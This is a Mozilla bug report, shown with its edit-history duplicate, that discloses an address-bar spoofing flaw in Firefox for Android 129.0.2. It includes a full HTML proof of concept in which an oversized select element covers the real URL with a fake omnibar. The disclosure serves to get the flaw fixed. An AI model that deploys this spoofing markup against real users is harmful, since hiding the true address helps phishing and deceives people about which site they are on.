User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Steps to reproduce:
Load below HTML in Mozilla android version 129.0.2. Open it in horizontal Click fake omni bar which obscured url by select option. Techniques that overlay the address bar with another piece of browser chrome to obscuring happened.
<meta name="viewport" content="width=device-width, initial-scale=1">
<head>
<title>Title of the document</title>
</head>
<style>
body {
margin: 0;
padding: 0;
overflow-x: hidden;
overflow-y: hidden;
}
select {
margin-top: 1%;
height: 89%;
width: 9999px;
}
</style>
<select id="selectElement">
<option id="spoofText"></option>
<option selected> </option>
<option selected> </option>
<option selected> </option>
<option selected></option>
<option selected></option>
<option selected></option>
<option selected>Fake Omni bar</option>
</select>
Actual results:
Techniques that overlay the address bar with another piece of browser chrome to obscuring happened.
Expected results:
Techniques that overlay the address bar with another piece of browser chrome to obscuring must not happened.
Bug 1917281 Comment 0 Edit History
Note: The actual edited comment in the bug view page will always show the original commenter’s name and original timestamp.
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Steps to reproduce:
Load below HTML in Mozilla android version 129.0.2. Open it in horizontal Click fake omni bar which obscured url by select option. Techniques that overlay the address bar with another piece of browser chrome to obscuring happened.
```HTML
<meta name="viewport" content="width=device-width, initial-scale=1">
<head>
<title>Title of the document</title>
</head>
<style>
body {
margin: 0;
padding: 0;
overflow-x: hidden;
overflow-y: hidden;
}
select {
margin-top: 1%;
height: 89%;
width: 9999px;
}
</style>
<select id="selectElement">
<option id="spoofText"></option>
<option selected> </option>
<option selected> </option>
<option selected> </option>
<option selected></option>
<option selected></option>
<option selected></option>
<option selected>Fake Omni bar</option>
</select>
```
Actual results:
Techniques that overlay the address bar with another piece of browser chrome to obscuring happened.
Expected results:
Techniques that overlay the address bar with another piece of browser chrome to obscuring must not happened.